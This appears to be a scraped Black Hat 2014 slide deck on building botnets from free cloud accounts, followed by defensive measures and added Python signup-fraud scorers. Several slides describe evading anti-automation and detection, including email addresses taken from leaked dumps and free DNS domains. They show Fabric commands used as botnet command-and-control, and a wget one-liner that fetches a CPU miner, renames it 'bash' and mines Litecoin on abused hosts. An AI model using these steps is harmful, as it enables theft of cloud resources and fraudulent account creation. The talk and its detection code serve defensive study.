CloudBots:
Harvesting Crypto Coins
Like a Botnet Farmer
2014 August 6
Main Topics
• Could we build a botnet from freely available cloud services?
• Will we see the rise of more cloud based botnets?
• Should insufficient anti-automation be considered a top ten vulnerability?
What are these guys talking about?
Overview
Platform as a Service
Cloud PaaS
Platform as a Service
Free Cloud Services
<Insert with other providers later>
Reference: http://goo.gl/AZ4nYp
Development Environment as a Service
Free Cloud Services
AUTOMATION
Scripting the Cloud
Automating Registration
• Hurdles
- Email address confirmation
- CAPTCHA
- Phone/SMS
- Credit Card
Usability vs Security
Cloud Providers (In)Security
Anti-Automation
Fraudulent Account Registration
[Chart: anti-automation measures at registration. Labels: More Anti-Automation, Email Confirmation Only; values: 66%, 33%; categories: Email, CAPTCHA, Credit Card, Phone]
Anti-Automation Techniques
• Email address confirmation
• CAPTCHA
• Phone/SMS
• Credit Card
Usability vs Security
Cloud Providers (In)Security
Automated email processing
- Wildcard localpart *@domain.com
- Extract important information from incoming emails
- Grep for confirmation token links and request them
Account registration
- Automatic request sent to account activation links
SMTP Services
Email Confirmation Token Processing
local-part@domain.tld
Email Address Anatomy
Using the Google AppEngine InboundMailHandler
- first.last.001@cloudbotmail.appspotmail.com
- first.last.002@cloudbotmail.appspotmail.com
- first.last.003@cloudbotmail.appspotmail.com
- first.last.004@cloudbotmail.appspotmail.com
- first.last.005@cloudbotmail.appspotmail.com
- first.last.006@cloudbotmail.appspotmail.com
- first.last.007@cloudbotmail.appspotmail.com
- first.last.008@cloudbotmail.appspotmail.com
- first.last.009@cloudbotmail.appspotmail.com
- first.last.010@cloudbotmail.appspotmail.com
Google App Engine
Detection issues
Unlimited usernames
- Prevent pattern recognition
- Pull from real world examples
[local-part from dump]@domain.tld
Realistic Randomness
Real Email Addresses
Unlimited domains
- freedns.afraid.org
- Prevent detection
- Thousands of unique email domains
SMTP Services
Plethora of Email Addresses
Unlimited email addresses
Free DNS Subdomains
What do we need?
• Free email relay
- Free MX registration
• Process wildcards
- *@domain.tld
• Send unlimited messages
- Unrestricted SMTP to HTTP POST/JSON requests
Free Signups
Receiving Email and Processing
Inbound Mail As A Service
Free Cloud Services
<Insert with other providers later>
Reference: http://goo.gl/yqoh6U
Automated email processing
- Extract important information from incoming emails
- Grep for confirmation token links and request them
Account registration
- Automatic request sent to account activation links
SMTP Services
Email Confirmation Token Processing
Reference: http://bishopfox.github.io/anti-anti-automation/
<Insert wall of random email addresses>
Realistic Randomness
Unique Email Addresses
Avoid Pattern Recognition
DEMONSTRATION
Automatic Account Creation
Automated Registration Workflow
Email Addresses
MongoDB
• MongoLab
• MongoHQ
Keeping track of all accounts
Storing Account Information
FUNTIVITIES
Botnets Are Fun!
What can we do?
• Distributed Network Scanning
• Distributed Password Cracking
• DDoS
• Click-fraud
• Crypto Currency Mining
• Data Storage
Now we have a botnet! Fun!
Botnet Activities
Refer Fake Friends
Unlimited Storage Space
What are we using?
• Fabric
- Fabric is a Python library and command-line tool for streamlining the use of SSH for application deployment or systems administration tasks.
• fab check_hosts -P -z 20
• fab run_command
Botnet C2
Command & Control
Unique Amazon IP Addresses
Distributed Command
[na1.cloudbox.net:2352]: curl http://icanhazip.com
4.109.182.13
[eu1.cloudbox.net:3127]: curl http://icanhazip.com
126.34.56.254
[na1.cloudbox.net:10660]: curl http://icanhazip.com
58.251.42.128
[na1.cloudbox.net:15627]: curl http://icanhazip.com
74.216.236.72
[na1.cloudbox.net:8000]: curl http://icanhazip.com
28.228.253.19
[na1.cloudbox.net:4028]: curl http://icanhazip.com
64.216.37.252
Make money, money
• Deploying miners
• One command for $$$
All your processors are belong to us
Litecoin Mining
if [ ! -f bash ]; then wget http://sourceforge.net/projects/cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz &&
  tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz &&
  rm pooler-cpuminer-2.3.2-linux-x86_64.tar.gz &&
  mv minerd bash; fi;
screen ./bash --url=stratum+tcp://pool.mine-litecoin.com --userpass=ninja.47:47;
rm bash
Load After Crypto Currency Mining
Distributed Command
ID | Host | Status
----------------------------------------
0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51
1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00
2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38
3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95
4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41
5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52
6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33
7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38
8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45
9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38
10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
All your processors are belong to us
Litecoin Mining
CLOUD BREAKOUT
Bypassing Restrictions
DETECTION
No one can catch a ninja!
Automatic Backups
• Propagate to other similar services
- e.g. MongoLab   MongoHQ
• Infrastructure across multiple service providers
• Easily migrated
Armadillo Up ™
Disaster Recovery Plan
RISING TREND
Active Attacks
Adaptation
Cloud Provider Registration
Crypto Coins & DDoS
Clouds Under Siege
PROTECTION
Bot Busters
What can we do?
• Logic puzzles
• Sound output
• Credit card validation
• Live operators
• Limited-use account
• Heuristic checks
• Federated identity systems
Usability vs Security
Protection
Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
What should we do?
• Analyzing properties of Sybil accounts
• Analyzing the arrival rate and distribution of accounts
• Flag accounts registered with emails from newly registered domain names
• Email verification
• CAPTCHAs
• IP Blacklisting
• Phone/SMS verification
• Automatic pattern recognition
At Abuse vs At Registration
Protection
Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
At Abuse vs At Registration
Protection
Advanced techniques
• Signup flow events
- Detect common activities after signup
• User-agent
- A registration bot may generate a different user-agent for each signup or use uncommon user-agents
• Form submission timing
- A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected
Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
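Added example (not from the slides or the authors' tooling): a registration-time scorer that combines the signals listed above, namely arrival rate per email domain, newly registered domains, numbered local-part templates such as first.last.001, user-agent churn per source IP, and form submission timing. The record fields, thresholds and sample signups are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Thresholds are illustrative assumptions; tune them against real signup data.
MIN_FORM_SECONDS = 3.0               # faster than a person can fill the form
NEW_DOMAIN_DAYS = 30                 # email domain registered very recently
TEMPLATE_MIN = 3                     # same numbered local-part shape, same domain
BURST_MIN = 4                        # signups from one email domain ...
BURST_WINDOW = timedelta(minutes=10) # ... inside this window
UA_PER_IP_MIN = 3                    # distinct user-agents from one source IP


def _rec(ts, email, ip, ua, form_seconds, domain_age_days):
    return {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "email": email,
            "ip": ip, "ua": ua, "form_seconds": form_seconds,
            "domain_age_days": domain_age_days}


# Constructed sample signups (reserved example domains and documentation IPs).
SIGNUPS = [
    _rec("2014-08-06 10:00:05", "first.last.001@mail.example-new.test",
         "203.0.113.7", "Mozilla/5.0 (constructed-1)", 0.9, 2),
    _rec("2014-08-06 10:00:31", "first.last.002@mail.example-new.test",
         "203.0.113.7", "Mozilla/5.0 (constructed-2)", 1.1, 2),
    _rec("2014-08-06 10:01:02", "first.last.003@mail.example-new.test",
         "203.0.113.7", "Mozilla/5.0 (constructed-3)", 0.8, 2),
    _rec("2014-08-06 10:01:40", "first.last.004@mail.example-new.test",
         "203.0.113.7", "Mozilla/5.0 (constructed-4)", 1.2, 2),
    # Realistic-looking local part on its own fresh domain: no template match,
    # no burst, but timing and domain age still stand out.
    _rec("2014-08-06 10:05:00", "maria.keller@inbox.example-fresh.test",
         "203.0.113.9", "Mozilla/5.0 (constructed-5)", 1.1, 1),
    # Ordinary signups.
    _rec("2014-08-06 10:02:10", "alice@example.org",
         "198.51.100.20", "Mozilla/5.0 (constructed-6)", 41.0, 5000),
    _rec("2014-08-06 11:30:00", "bob7@example.net",
         "198.51.100.33", "Mozilla/5.0 (constructed-7)", 25.0, 4000),
]


def _shape(email):
    """Return (template, digit_runs, domain); digit runs are collapsed to '#'."""
    local, _, domain = email.lower().rpartition("@")
    template, digit_runs = re.subn(r"\d+", "#", local)
    return template, digit_runs, domain


def flag_signups(signups):
    """Map each email to the sorted list of heuristics it trips."""
    template_count = defaultdict(int)
    times_by_domain = defaultdict(list)
    uas_by_ip = defaultdict(set)
    for s in signups:
        template, _, domain = _shape(s["email"])
        template_count[(template, domain)] += 1
        times_by_domain[domain].append(s["ts"])
        uas_by_ip[s["ip"]].add(s["ua"])

    result = {}
    for s in signups:
        template, digit_runs, domain = _shape(s["email"])
        flags = set()
        if s["form_seconds"] < MIN_FORM_SECONDS:
            flags.add("fast_form")
        if s["domain_age_days"] < NEW_DOMAIN_DAYS:
            flags.add("new_domain")
        if digit_runs and template_count[(template, domain)] >= TEMPLATE_MIN:
            flags.add("numbered_template")
        nearby = sum(1 for t in times_by_domain[domain]
                     if abs(t - s["ts"]) <= BURST_WINDOW)
        if nearby >= BURST_MIN:
            flags.add("burst")
        if len(uas_by_ip[s["ip"]]) >= UA_PER_IP_MIN:
            flags.add("ua_churn")
        result[s["email"]] = sorted(flags)
    return result


def suspicious(signups, min_flags=2):
    """Emails tripping at least min_flags independent heuristics."""
    return sorted(e for e, f in flag_signups(signups).items()
                  if len(f) >= min_flags)


if __name__ == "__main__":
    for email, flags in flag_signups(SIGNUPS).items():
        print(f"{email:45s} {', '.join(flags) or '-'}")
```

Requiring two or more independent signals keeps a single numbered address such as bob7 from being flagged, while the account with a realistic local part is still caught on timing plus domain age.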
THANK YOU
Oscar Salazar @tracertea
Rob Ragan @sweepthatleg
CONTACT@BISHOPFOX.COM

Ensuring Efficiency and Speed with Practical Solutions for Clinical OperationsEnsuring Efficiency and Speed with Practical Solutions for Clinical Operations
Ensuring Efficiency and Speed with Practical Solutions for Clinical Operations
 
42 Ways to Generate Real Estate Leads - Sellxpert
42 Ways to Generate Real Estate Leads - Sellxpert42 Ways to Generate Real Estate Leads - Sellxpert
42 Ways to Generate Real Estate Leads - Sellxpert
 
Alluxio Webinar | 10x Faster Trino Queries on Your Data Platform
Alluxio Webinar | 10x Faster Trino Queries on Your Data PlatformAlluxio Webinar | 10x Faster Trino Queries on Your Data Platform
Alluxio Webinar | 10x Faster Trino Queries on Your Data Platform
 
bgiolcb
bgiolcbbgiolcb
bgiolcb
 
Call Girls Bangalore🔥7023059433🔥Best Profile Escorts in Bangalore Available 24/7
Call Girls Bangalore🔥7023059433🔥Best Profile Escorts in Bangalore Available 24/7Call Girls Bangalore🔥7023059433🔥Best Profile Escorts in Bangalore Available 24/7
Call Girls Bangalore🔥7023059433🔥Best Profile Escorts in Bangalore Available 24/7
 
Folding Cheat Sheet #6 - sixth in a series
Folding Cheat Sheet #6 - sixth in a seriesFolding Cheat Sheet #6 - sixth in a series
Folding Cheat Sheet #6 - sixth in a series
 
What’s New in VictoriaLogs - Q2 2024 Update
What’s New in VictoriaLogs - Q2 2024 UpdateWhat’s New in VictoriaLogs - Q2 2024 Update
What’s New in VictoriaLogs - Q2 2024 Update
 
Migration From CH 1.0 to CH 2.0 and Mule 4.6 & Java 17 Upgrade.pptx
Migration From CH 1.0 to CH 2.0 and  Mule 4.6 & Java 17 Upgrade.pptxMigration From CH 1.0 to CH 2.0 and  Mule 4.6 & Java 17 Upgrade.pptx
Migration From CH 1.0 to CH 2.0 and Mule 4.6 & Java 17 Upgrade.pptx
 
How GenAI Can Improve Supplier Performance Management.pdf
How GenAI Can Improve Supplier Performance Management.pdfHow GenAI Can Improve Supplier Performance Management.pdf
How GenAI Can Improve Supplier Performance Management.pdf
 

Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer

  • 1. CloudBots: Harvesting Crypto Coins Like a Botnet Farmer 2014 August 6
  • 2. Main Topics • Could we build a botnet from freely available cloud services? • Will we see the rise of more cloud based botnets? • Should insufficient anti-automation be considered a top ten vulnerability? What are these guys talking about? Overview
  • 3. Platform as a Service Cloud PaaS
  • 4. Platform as a Service Free Cloud Services <Insert with other providers later> Reference: http://goo.gl/AZ4nYp
  • 5. Development Environment as a Service Free Cloud Services
  • 7. Automating Registration • Hurdles - Email address confirmation - CAPTCHA - Phone/SMS - Credit Card Usability vs Security Cloud Providers (In)Security
  • 8. Anti-Automation Fraudulent Account Registration More Anti-Automation Email Confirmation Only 66% 33% EMAIL CAPTCHA CREDIT CARD PHONE
  • 9. Anti-Automation Techniques • Email address confirmation • CAPTCHA • Phone/SMS • Credit Card Usability vs Security Cloud Providers (In)Security
  • 10. Automated email processing - Wildcard localpart *@domain.com - Extract important information from incoming emails - Grep for confirmation token links and request them Account registration - Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing
  • 12. Using the Google AppEngine InboundMailHandler - first.last.001@cloudbotmail.appspotmail.com - first.last.002@cloudbotmail.appspotmail.com - first.last.003@cloudbotmail.appspotmail.com - first.last.004@cloudbotmail.appspotmail.com - first.last.005@cloudbotmail.appspotmail.com - first.last.006@cloudbotmail.appspotmail.com - first.last.007@cloudbotmail.appspotmail.com - first.last.008@cloudbotmail.appspotmail.com - first.last.009@cloudbotmail.appspotmail.com - first.last.010@cloudbotmail.appspotmail.com Google App Engine Detection issues
  • 13. Unlimited usernames - Prevent pattern recognition - Pull from real world examples [local-part from dump]@domain.tld Realistic Randomness Real Email Addresses
  • 14. Unlimited domains - freedns.afraid.org - Prevent detection - Thousands of unique email domains SMTP Services Plethora of Email Addresses
  • 16. What do we need? • Free email relay - Free MX registration • Process wildcards - *@domain.tld • Send unlimited messages - Unrestricted SMTP to HTTP POST/JSON requests Free Signups Receiving Email and Processing
  • 17. Inbound Mail As A Service Free Cloud Services <Insert with other providers later> Reference: http://goo.gl/yqoh6U
  • 18. Automated email processing - Extract important information from incoming emails - Grep for confirmation token links and request them Account registration - Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing Reference: http://bishopfox.github.io/anti-anti-automation/
  • 19. <Insert wall of random email addresses> Realistic Randomness Unique Email Addresses Avoid Pattern Recognition
  • 22. MongoDB • MongoLab • MongoHQ Keeping track of all accounts Storing Account Information
  • 24. What can we do? • Distributed Network Scanning • Distributed Password Cracking • DDoS • Click-fraud • Crypto Currency Mining • Data Storage Now we have a botnet! Fun! Botnet Activities
  • 27. What are we using? • Fabric - Fabric is a Python library and command-line tool for streamlining the use of SSH for application deployment or systems administration tasks. • fab check_hosts -P -z 20 • fab run_command Botnet C2 Command & Control
  • 28. Unique Amazon IP Addresses Distributed Command
      [na1.cloudbox.net:2352]: curl http://icanhazip.com 4.109.182.13
      [eu1.cloudbox.net:3127]: curl http://icanhazip.com 126.34.56.254
      [na1.cloudbox.net:10660]: curl http://icanhazip.com 58.251.42.128
      [na1.cloudbox.net:15627]: curl http://icanhazip.com 74.216.236.72
      [na1.cloudbox.net:8000]: curl http://icanhazip.com 28.228.253.19
      [na1.cloudbox.net:4028]: curl http://icanhazip.com 64.216.37.252
  • 29. Make money, money • Deploying miners • One command for $$$ All your processors are belong to us Litecoin Mining
      if [ ! -f bash ]; then wget http://sourceforge.net/projects/cpuminer/files/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && rm pooler-cpuminer-2.3.2-linux-x86_64.tar.gz && mv minerd bash; fi; screen ./bash --url=stratum+tcp://pool.mine-litecoin.com --userpass=ninja.47:47; rm bash
  • 30. Load After Crypto Currency Mining Distributed Command
      ID | Host                   | Status
      ----------------------------------------
      0  | na1.cloudbox.net:1678  | 2 users, load average: 37.08, 37.60, 32.51
      1  | na1.cloudbox.net:15121 | 1 user, load average: 16.35, 15.35, 12.00
      2  | na1.cloudbox.net:11631 | 1 user, load average: 19.65, 18.46, 14.38
      3  | na1.cloudbox.net:4358  | 2 users, load average: 23.10, 22.91, 18.95
      4  | na1.cloudbox.net:1212  | 1 user, load average: 19.60, 18.47, 14.41
      5  | na1.cloudbox.net:5841  | 1 user, load average: 19.97, 18.61, 14.52
      6  | eu1.cloudbox.net:3025  | 1 user, load average: 19.27, 18.37, 14.33
      7  | eu1.cloudbox.net:6892  | 2 users, load average: 19.65, 18.46, 14.38
      8  | eu1.cloudbox.net:2038  | 1 user, load average: 18.85, 17.43, 13.45
      9  | na1.cloudbox.net:5235  | 1 user, load average: 18.55, 17.32, 13.38
      10 | na1.cloudbox.net:1122  | 1 user, load average: 26.04, 25.57, 20.02
  • 31. All your processors are belong to us Litecoin Mining
  • 33. DETECTION No one can catch a ninja!
  • 34. Automatic Backups • Propagate to other similar services - e.g. MongoLab   MongoHQ • Infrastructure across multiple service providers • Easily migrated Armadillo Up ™ Disaster Recovery Plan
  • 39. Crypto Coins & DDoS Clouds Under Siege
  • 40. Crypto Coins & DDoS Clouds Under Siege
  • 42. What can we do? • Logic puzzles • Sound output • Credit card validation • Live operators • Limited-use account • Heuristic checks • Federated identity systems Usability vs Security Protection Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
  • 43. What should we do? • Analyzing properties of Sybil accounts • Analyzing the arrival rate and distribution of accounts • Flag accounts registered with emails from newly registered domain names • Email verification • CAPTCHAs • IP Blacklisting • Phone/SMS verification • Automatic pattern recognition At Abuse vs At Registration Protection Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 44. At Abuse vs At Registration Protection Advanced techniques • Signup flow events - Detect common activities after signup • User-agent - A registration bot may generate a different user-agent for each signup or use uncommon user-agents • Form submission timing - A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 45. THANK YOU Oscar Salazar @tracertea Rob Ragan @sweepthatleg CONTACT@BISHOPFOX.COM
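
Three of the registration-time checks from slides 43 and 44 (arrival rate of accounts, automatic pattern recognition on addresses such as the numbered local-parts on slide 12, and form submission timing) can be combined in one pass over signup records. This is an added example, not code from the presentation; the record layout, thresholds and function names are assumptions, and the sample signups are constructed.

```python
import re
from collections import defaultdict

# Constructed sample records: (email, seconds spent on the signup form, signup time in epoch seconds)
SIGNUPS = [
    ("first.last.001@mail.example", 0.8, 1000),
    ("first.last.002@mail.example", 0.9, 1004),
    ("first.last.003@mail.example", 0.7, 1009),
    ("alice.w@example.org", 41.0, 1020),
    ("bob1987@example.net", 27.5, 5000),
    ("carol@example.org", 1.2, 9000),
]

def template(local_part):
    """Collapse digit runs so first.last.001 and first.last.002 compare equal."""
    return re.sub(r"\d+", "#", local_part.lower())

def flag_signups(signups, min_form_seconds=3.0, window=60, burst=3):
    """Return {email: sorted list of reasons} for signups that trip a heuristic."""
    by_template = defaultdict(list)   # (domain, template) -> emails
    by_domain = defaultdict(list)     # domain -> [(time, email)]
    reasons = defaultdict(set)
    for email, form_seconds, ts in signups:
        local, _, domain = email.rpartition("@")
        domain = domain.lower()
        by_template[(domain, template(local))].append(email)
        by_domain[domain].append((ts, email))
        # Form submission timing: completed faster than a person plausibly types.
        if form_seconds < min_form_seconds:
            reasons[email].add("fast-submit")
    # Pattern recognition: numbered variants of one local-part on one domain.
    for (domain, tpl), emails in by_template.items():
        if "#" in tpl and len(emails) >= burst:
            for e in emails:
                reasons[e].add("templated-local-part")
    # Arrival rate: `burst` or more signups from one domain inside `window` seconds.
    for domain, events in by_domain.items():
        events.sort()
        for i in range(len(events) - burst + 1):
            run = events[i:i + burst]
            if run[-1][0] - run[0][0] <= window:
                for _, e in run:
                    reasons[e].add("domain-burst")
    return {e: sorted(r) for e, r in reasons.items()}
```

A single reason such as `fast-submit` is weak on its own (password managers autofill forms quickly); accounts that collect several reasons are the ones worth holding for review or a stronger verification step.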